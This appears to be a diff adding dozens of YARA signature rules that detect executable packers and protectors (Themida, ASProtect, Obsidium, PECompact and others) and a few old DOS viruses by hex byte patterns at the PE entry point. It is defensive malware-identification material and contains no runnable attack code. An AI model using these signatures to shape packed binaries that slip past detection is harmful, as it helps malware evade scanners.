+	$a1 = { 55 8B EC 81 EC D4 01 00 00 53 56 57 EB 0C 45 78 50 72 2D 76 2E 31 2E 32 2E 2E B8 ?? ?? ?? ?? 2B 05 84 ?? ?? ?? A3 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? 00 74 16 A1 ?? ?? ?? ?? 03 05 80 ?? ?? ?? 89 85 54 FE FF FF E9 ?? 07 00 00 C7 05 ?? ?? ?? ?? 01 00 00 00 68 04 }
+	$a2 = { 55 8B EC 81 EC D4 01 00 00 53 56 57 EB 0C 45 78 50 72 2D 76 2E 31 2E 32 2E 2E B8 ?? ?? ?? ?? 2B 05 84 ?? ?? ?? A3 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? 00 74 16 A1 ?? ?? ?? ?? 03 05 80 ?? ?? ?? 89 85 54 FE FF FF E9 ?? 07 00 00 C7 05 ?? ?? ?? ?? 01 00 00 00 68 04 01 00 00 8D 85 F0 FE FF FF 50 6A 00 FF 15 }
+
+condition:
+		$a0 or $a1 at pe.entry_point or $a2 at pe.entry_point
+}
+	
+	
+rule NullsoftPIMPInstallSystemv13x
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 81 EC ?? ?? 00 00 56 57 6A ?? BE ?? ?? ?? ?? 59 8D BD }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Enigmaprotector110111VladimirSukhov
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 5D 83 ED 06 81 ED ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? E8 01 00 00 00 9A 83 C4 04 EB 02 FF 35 60 E8 24 00 00 00 00 00 FF EB 02 CD 20 8B 44 24 0C 83 80 B8 00 00 00 03 31 }
+	$a1 = { 60 E8 00 00 00 00 5D 83 ED 06 81 ED ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? E8 01 00 00 00 9A 83 C4 04 EB 02 FF 35 60 E8 24 00 00 00 00 00 FF EB 02 CD 20 8B 44 24 0C 83 80 B8 00 00 00 03 31 C0 C3 83 C0 08 EB 02 FF 15 89 C4 61 EB 2E EA EB 2B 83 04 24 03 EB 01 00 31 C0 EB 01 85 64 FF 30 EB 01 83 64 89 20 EB 02 CD 20 89 00 9A 64 8F 05 00 00 00 00 EB 02 C1 90 58 61 EB 01 3E EB ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? E8 01 00 00 00 9A 83 C4 04 01 E8 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? E8 01 00 00 00 9A 83 C4 04 05 F6 01 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? E8 01 00 00 00 9A 83 C4 04 B9 3D 1A }
+
+condition:
+		$a0 or $a1
+}
+	
+	
+rule PECompactv140b5v140b6
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 0F A0 40 ?? 87 DD 8B 85 A6 A0 40 ?? 01 85 03 A0 40 ?? 66 C7 85 ?? A0 40 ?? 90 90 01 85 9E A0 40 ?? BB 8A 11 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VxExplosion1000
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 ?? ?? 5E 1E 06 50 81 ?? ?? ?? 56 FC B8 21 35 CD 21 2E ?? ?? ?? ?? 2E ?? ?? ?? ?? 26 ?? ?? ?? ?? ?? ?? 74 ?? 8C D8 48 8E D8 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PKZIPSFXv11198990
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { FC 2E 8C 0E ?? ?? A1 ?? ?? 8C CB 81 C3 ?? ?? 3B C3 72 ?? 2D ?? ?? 2D ?? ?? FA BC ?? ?? 8E D0 FB }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PEBundlev20b5v23
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB ?? ?? 40 ?? 87 DD 01 AD ?? ?? ?? ?? 01 AD }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PUNiSHERV15DemoFEUERRADER
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 04 83 A4 BC CE 60 EB 04 80 BC 04 11 E8 00 00 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule HACKSTOPv110v111
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { B4 30 CD 21 86 E0 3D ?? ?? 73 ?? B4 2F CD 21 B0 ?? B4 4C CD 21 50 B8 ?? ?? 58 EB }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Obsidium1336ObsidiumSoftware
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 04 ?? ?? ?? ?? E8 28 00 00 00 EB 01 ?? ?? ?? ?? ?? ?? ?? 8B 54 24 0C EB 01 ?? 83 82 B8 00 00 00 26 EB 04 ?? ?? ?? ?? 33 C0 EB 01 ?? C3 EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 64 67 FF 36 00 00 EB 04 ?? ?? ?? ?? 64 67 89 26 00 00 EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 50 EB 01 ?? 33 C0 EB 02 ?? ?? 8B 00 EB 04 ?? ?? ?? ?? C3 EB 04 ?? ?? ?? ?? E9 FA 00 00 00 EB 03 ?? ?? ?? E8 D5 FF FF FF EB 01 ?? EB 03 ?? ?? ?? 58 EB 02 ?? ?? EB 04 ?? ?? ?? ?? 64 67 8F 06 00 00 EB 04 }
+
+condition:
+		$a0
+}
+	
+	
+rule DualseXeEncryptor10bDual
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 81 EC 00 05 00 00 E8 00 00 00 00 5D 81 ED 0E 00 00 00 8D 85 3A 04 00 00 89 28 33 FF 8D 85 80 03 00 00 8D 8D 3A 04 00 00 2B C8 8B 9D 8A 04 00 00 E8 24 02 00 00 8D 9D 58 03 00 00 8D B5 7F 03 00 00 46 80 3E 00 74 24 56 FF 95 58 05 00 00 46 80 3E 00 75 FA 46 80 3E 00 74 E7 50 56 50 FF 95 5C 05 00 00 89 03 58 83 C3 04 EB E3 8D 85 69 02 00 00 FF D0 8D 85 56 04 00 00 50 68 1F 00 02 00 6A 00 8D 85 7A 04 00 00 50 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule MarjinZEXEScramblerSEbyMarjinZ
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 A3 02 00 00 E9 35 FD FF FF FF 25 C8 20 00 10 6A 14 68 C0 21 00 10 E8 E4 01 00 00 FF 35 7C 33 00 10 8B 35 8C 20 00 10 FF D6 59 89 45 E4 83 F8 FF 75 0C FF 75 08 FF 15 88 20 00 10 59 EB 61 6A 08 E8 02 03 00 00 59 83 65 FC 00 FF 35 7C 33 00 10 FF D6 89 45 E4 FF 35 78 33 00 10 FF D6 89 45 E0 8D 45 E0 50 8D 45 E4 50 FF 75 08 E8 D1 02 00 00 89 45 DC FF 75 E4 8B 35 74 20 00 10 FF D6 A3 7C 33 00 10 FF 75 E0 FF D6 83 C4 1C A3 78 33 00 10 C7 45 FC FE FF FF FF E8 09 00 00 00 8B 45 DC E8 A0 01 00 00 C3 }
+
+condition:
+		$a0
+}
+	
+	
+rule nPack111502006BetaNEOx
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 83 3D ?? ?? ?? ?? ?? 75 05 E9 01 00 00 00 C3 E8 41 00 00 00 B8 ?? ?? ?? ?? 2B 05 ?? ?? ?? ?? A3 ?? ?? ?? ?? E8 5E 00 00 00 E8 E0 01 00 00 E8 EC 06 00 00 E8 F7 05 00 00 A1 ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? 01 05 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? C3 C3 56 57 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 8B F8 68 ?? ?? ?? ?? 57 FF D6 68 ?? ?? ?? ?? 57 A3 ?? ?? ?? ?? FF D6 5F A3 ?? ?? ?? ?? 5E C3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule DingBoysPElockPhantasmv15b3
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 9C 55 57 56 52 51 53 9C FA E8 00 00 00 00 5D 81 ED 5B 53 40 00 B0 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ShellModify01pll621
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 6A FF 68 98 66 41 00 68 3C 3D 41 00 64 A1 00 00 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PseudoSigner01MacromediaFlashProjector60Anorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 90 90 90 90 68 ?? ?? ?? ?? 67 64 FF 36 00 00 67 64 89 26 00 00 F1 90 90 90 90 83 EC 44 56 FF 15 24 81 49 00 8B F0 8A 06 3C 22 75 1C 8A 46 01 46 3C 22 74 0C 84 C0 74 08 8A 46 01 46 3C 22 75 F4 80 3E 22 75 0F 46 EB 0C E9 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Packman0001Bubbasoft
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 0F 85 ?? FF FF FF 8D B3 ?? ?? ?? ?? EB 3D 8B 46 0C 03 C3 50 FF 55 00 56 8B 36 0B F6 75 02 8B F7 03 F3 03 FB EB 1B D1 C1 D1 E9 73 05 0F B7 C9 EB 05 03 CB 8D 49 02 50 51 50 FF 55 04 AB 58 83 C6 04 8B 0E 85 C9 75 DF 5E 83 C6 14 8B 7E 10 85 FF 75 BC 8D 8B 00 }
+
+condition:
+		$a0
+}
+	
+	
+rule aPackv098bDSESnotsaved
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 8C CB BA ?? ?? 03 DA FC 33 F6 33 FF 4B 8E DB 8D ?? ?? ?? 8E C0 B9 ?? ?? F3 A5 4A 75 }
+
+condition:
+		$a0
+}
+	
+	
+rule ASProtectvIfyouknowthisversionpostonPEiDboardh2
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 90 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? 00 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 DD 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }
+
+condition:
+		$a0
+}
+	
+	
+rule Aluwainv809
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 8B EC 1E E8 ?? ?? 9D 5E }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule AntiDote12DLLDemoSISTeam
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 10 66 62 3A 43 2B 2B 48 4F 4F 4B 90 E9 08 32 90 90 90 90 90 90 90 90 90 90 80 7C 24 08 01 0F 85 ?? ?? ?? ?? 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD FF EB 0B 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 EF 75 09 8B 1E 83 EE FC 11 DB 73 E4 31 C9 83 E8 03 72 0D C1 E0 08 8A 06 46 83 F0 FF 74 74 89 C5 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C9 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C9 75 20 41 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C9 01 DB 73 EF 75 09 8B 1E 83 EE FC 11 DB 73 E4 83 C1 02 81 FD 00 F3 FF FF 83 D1 01 8D 14 2F 83 FD FC 76 0F 8A 02 42 88 07 47 49 75 F7 E9 63 FF FF FF 90 8B 02 83 C2 04 89 07 83 C7 04 83 E9 04 77 F1 01 CF E9 4C FF FF FF }
+
+condition:
+		$a0
+}
+	
+	
+rule MSLRHv032afakeMicrosoftVisualCemadicius
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 6A FF 68 CA 37 41 00 68 06 38 41 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 64 8F 05 00 00 00 00 83 C4 0C 5D EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 2B 04 24 74 04 75 02 EB 02 EB 01 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule SoftwareCompressV12BGSoftwareProtectTechnologies
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E9 BE 00 00 00 60 8B 74 24 24 8B 7C 24 28 FC B2 80 33 DB A4 B3 02 E8 6D 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Themida1201OreansTechnologies
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 8B C5 8B D4 60 E8 00 00 00 00 5D 81 ED ?? ?? 35 09 89 95 ?? ?? 35 09 89 B5 ?? ?? 35 09 89 85 ?? ?? 35 09 83 BD ?? ?? 35 09 00 74 0C 8B E8 8B E2 B8 01 00 00 00 C2 0C 00 8B 44 24 24 89 85 ?? ?? 35 09 6A 45 E8 A3 00 00 00 68 9A 74 83 07 E8 DF 00 00 00 68 25 }
+
+condition:
+		$a0
+}
+	
+	
+rule PECompactv126b1v126b2
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 0F 70 40 ?? 87 DD 8B 85 A6 70 40 ?? 01 85 03 70 40 ?? 66 C7 85 70 40 90 ?? 90 01 85 9E 70 40 BB ?? 05 0E }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Cruncherv10
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 2E ?? ?? ?? ?? 2E ?? ?? ?? B4 30 CD 21 3C 03 73 ?? BB ?? ?? 8E DB 8D ?? ?? ?? B4 09 CD 21 06 33 C0 50 CB }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule AntiDote1214SEDLLSISTeam
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 10 66 62 3A 43 2B 2B 48 4F 4F 4B 90 E9 08 32 90 90 90 90 90 90 90 90 90 90 80 7C 24 08 01 0F 85 ?? ?? ?? ?? 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD FF EB 0B 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 ?? 75 ?? 8B 1E 83 EE FC 11 DB }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ASProtectSKE21xexeAlexeySolodovnikov
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 90 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 ED 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }
+
+condition:
+		$a0
+}
+	
+	
+rule DBPEv210DingBoy
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 20 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 9C 55 57 56 52 51 53 9C E8 ?? ?? ?? ?? 5D 81 ED ?? ?? ?? ?? EB 58 75 73 65 72 33 32 2E 64 6C 6C ?? 4D 65 73 73 61 67 65 42 6F 78 41 ?? 6B 65 72 6E 65 6C }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule NsPacKV37LiuXingPing
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 9C 60 E8 00 00 00 00 5D 83 ED 07 8D ?? ?? ?? ?? ?? 80 39 01 0F ?? ?? ?? 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule tElock099tE
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E9 5E DF FF FF 00 00 00 ?? ?? ?? ?? E5 ?? ?? 00 00 00 00 00 00 00 00 00 05 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule WinZipSelfExtractor22personaleditionWinZipComputing
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 53 FF 15 58 70 40 00 B3 22 38 18 74 03 80 C3 FE 40 33 D2 8A 08 3A CA 74 10 3A CB 74 07 40 8A 08 3A CA 75 F5 38 10 74 01 40 52 50 52 52 FF 15 5C 70 40 00 50 E8 15 FB FF FF 50 FF 15 8C 70 40 00 5B }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+rule ZipWorxSecureEXEv25ZipWORXTechnologiesLLC
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E9 B8 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 53 65 63 75 72 65 45 58 45 20 45 78 65 63 75 74 61 62 6C 65 20 46 69 6C 65 20 50 72 6F 74 65 63 74 6F 72 0D 0A 43 6F 70 79 72 69 67 68 74 28 63 29 20 32 30 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule RLPackFullEdition117iBoxaPLibAp0x
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 8B 2C 24 83 C4 04 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 8D B5 79 29 00 00 8D 9D 2C 03 00 00 33 FF ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? EB 0F FF 74 37 04 FF 34 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Alloyv1x2000
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 07 20 40 ?? 87 DD 6A 04 68 ?? 10 ?? ?? 68 ?? 02 ?? ?? 6A ?? FF 95 46 23 40 ?? 0B }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule FreeJoiner153Stubengine171GlOFF
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 02 FD FF FF 6A 00 E8 0D 00 00 00 CC FF 25 80 10 40 00 FF 25 84 10 40 00 FF 25 88 10 40 00 FF 25 8C 10 40 00 FF 25 90 10 40 00 FF 25 94 10 40 00 FF 25 98 10 40 00 FF 25 9C 10 40 00 FF 25 A0 10 40 00 FF 25 A8 10 40 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PseudoSigner02MicrosoftVisualC70DLLAnorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8D 6C 01 00 81 EC 00 00 00 00 8B 45 90 83 F8 01 56 0F 84 00 00 00 00 85 C0 0F 84 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule EYouDiDaiYueHeiFengGao
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 53 56 57 0F 31 8B D8 0F 31 8B D0 2B D3 C1 EA 10 B8 ?? ?? ?? ?? 0F 6E C0 B8 ?? ?? ?? ?? 0F 6E C8 0F F5 C1 0F 7E C0 0F 77 03 C2 ?? ?? ?? ?? ?? FF E0 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule EXECryptorV21Xsoftcompletecom
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 83 C6 14 8B 55 FC E9 ?? FF FF FF }
+	$a1 = { E9 ?? ?? ?? ?? 66 9C 60 50 8D 88 ?? ?? ?? ?? 8D 90 04 16 ?? ?? 8B DC 8B E1 }
+
+condition:
+		$a0 or $a1 at pe.entry_point
+}
+	
+	
+rule PCShrinkerv045
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BD ?? ?? ?? ?? 01 AD E3 38 40 ?? FF B5 DF 38 40 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule yodasProtectorV1033AshkbizDanehkar
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 03 00 00 00 EB 01 ?? BB 55 00 00 00 E8 03 00 00 00 EB 01 ?? E8 8E 00 00 00 E8 03 00 00 00 EB 01 ?? E8 81 00 00 00 E8 03 00 00 00 EB 01 ?? E8 B7 00 00 00 E8 03 00 00 00 EB 01 ?? E8 AA 00 00 00 E8 03 00 00 00 EB 01 ?? 83 FB 55 E8 03 00 00 00 EB 01 ?? 75 2D E8 03 00 00 00 EB 01 ?? 60 E8 00 00 00 00 5D 81 ED 07 E2 40 00 8B D5 81 C2 56 E2 40 00 52 E8 01 00 00 00 C3 C3 E8 03 00 00 00 EB 01 ?? E8 0E 00 00 00 E8 D1 FF FF FF C3 E8 03 00 00 00 EB 01 ?? 33 C0 64 FF 30 64 89 20 CC C3 E8 03 00 00 00 EB 01 ?? 33 C0 64 FF 30 64 89 20 4B CC C3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule SoftSentryv211
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 83 EC ?? 53 56 57 E9 50 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule FSGv120EngdulekxtBorlandDelphiBorlandC
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 0F BE C1 EB 01 0E 8D 35 C3 BE B6 22 F7 D1 68 43 ?? ?? 22 EB 02 B5 15 5F C1 F1 15 33 F7 80 E9 F9 BB F4 00 00 00 EB 02 8F D0 EB 02 08 AD 8A 16 2B C7 1B C7 80 C2 7A 41 80 EA 10 EB 01 3C 81 EA CF AE F1 AA EB 01 EC 81 EA BB C6 AB EE 2C E3 32 D3 0B CB 81 EA AB }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule AHTeamEPProtector03fakeStonesPEEncryptor20FEUERRADER
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 90 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 90 FF E0 53 51 52 56 57 55 E8 00 00 00 00 5D 81 ED 42 30 40 00 FF 95 32 35 40 00 B8 37 30 40 00 03 C5 2B 85 1B 34 40 00 89 85 27 34 40 00 83 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Armadillov300
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 ?? ?? ?? ?? 5D 50 51 EB 0F B9 EB 0F B8 EB 07 B9 EB 0F 90 EB 08 FD EB 0B F2 EB F5 EB F6 F2 EB 08 FD EB E9 F3 EB E4 FC E9 59 58 60 33 C9 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule RCryptorv11Vaska
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 8B 04 24 83 E8 4F 68 ?? ?? ?? ?? FF D0 }
+	$a1 = { 8B 04 24 83 E8 4F 68 ?? ?? ?? ?? FF D0 B8 ?? ?? ?? ?? 3D ?? ?? ?? ?? 74 06 80 30 ?? 40 EB F3 }
+
+condition:
+		$a0 or $a1
+}
+	
+	
+rule Fusion10jaNooNi
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 68 04 30 40 00 68 04 30 40 00 E8 09 03 00 00 68 04 30 40 00 E8 C7 02 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule UpxLock1012CyberDoomTeamXBoBBobSoft
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 5D 81 ED 48 12 40 00 60 E8 2B 03 00 00 61 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PCPEEncryptorAlphapreview
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 53 51 52 56 57 55 E8 00 00 00 00 5D 8B CD 81 ED 33 30 40 ?? 2B 8D EE 32 40 00 83 E9 0B 89 8D F2 32 40 ?? 80 BD D1 32 40 ?? 01 0F 84 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VxKeypress1212
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 ?? ?? E8 ?? ?? E8 ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? EA ?? ?? ?? ?? 1E 33 DB 8E DB BB }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule SoftwareCompressv12BGSoftwareProtectTechnologies
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E9 BE 00 00 00 60 8B 74 24 24 8B 7C 24 28 FC B2 80 33 DB A4 B3 02 E8 6D 00 00 00 73 F6 33 C9 E8 64 00 00 00 73 1C 33 C0 E8 5B 00 00 00 73 23 B3 02 41 B0 10 E8 4F 00 00 00 12 C0 73 F7 75 3F AA EB D4 E8 4D 00 00 00 2B CB 75 10 E8 42 00 00 00 EB 28 AC D1 E8 74 4D 13 C9 EB 1C 91 48 C1 E0 08 AC E8 2C 00 00 00 3D 00 7D 00 00 73 0A 80 FC 05 73 06 83 F8 7F 77 02 41 41 95 8B C5 B3 01 56 8B F7 2B F0 F3 A4 5E EB 8E 02 D2 75 05 8A 16 46 12 D2 C3 33 C9 41 E8 EE FF FF FF 13 C9 E8 E7 FF FF FF 72 F2 C3 2B 7C 24 28 89 7C 24 1C 61 C3 60 FF 74 24 24 6A 40 FF 95 1A 0F 41 00 89 44 24 1C 61 C2 04 00 E8 00 00 00 00 81 2C 24 3A 10 41 00 5D E8 00 00 00 00 81 2C 24 31 01 00 00 8B 85 2A 0F 41 00 29 04 24 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule NsPackV14LiuXingPing
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 9C 60 E8 00 00 00 00 5D B8 B1 85 40 00 2D AA 85 40 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VProtectorV11Avcasm
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 0B 5B 56 50 72 6F 74 65 63 74 5D 00 E8 24 00 00 00 8B 44 24 04 8B 00 3D 04 00 00 80 75 08 8B 64 24 08 EB 04 58 EB 0C E9 64 8F 05 00 00 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Obsidium1300ObsidiumSoftware
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 04 ?? ?? ?? ?? E8 29 00 00 00 EB 02 ?? ?? EB 01 ?? 8B 54 24 0C EB 02 ?? ?? 83 82 B8 00 00 00 22 EB 02 ?? ?? 33 C0 EB 04 ?? ?? ?? ?? C3 EB 04 ?? ?? ?? ?? EB 04 ?? ?? ?? ?? 64 67 FF 36 00 00 EB 04 ?? ?? ?? ?? 64 67 89 26 00 00 EB 04 ?? ?? ?? ?? EB 01 ?? 50 EB 03 ?? ?? ?? 33 C0 EB 02 ?? ?? 8B 00 EB 01 ?? C3 EB 04 ?? ?? ?? ?? E9 FA 00 00 00 EB 01 ?? E8 D5 FF FF FF EB 02 ?? ?? EB 03 ?? ?? ?? 58 EB 04 ?? ?? ?? ?? EB 01 ?? 64 67 8F 06 00 00 EB 02 ?? ?? 83 C4 04 EB 02 ?? ?? E8 47 26 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
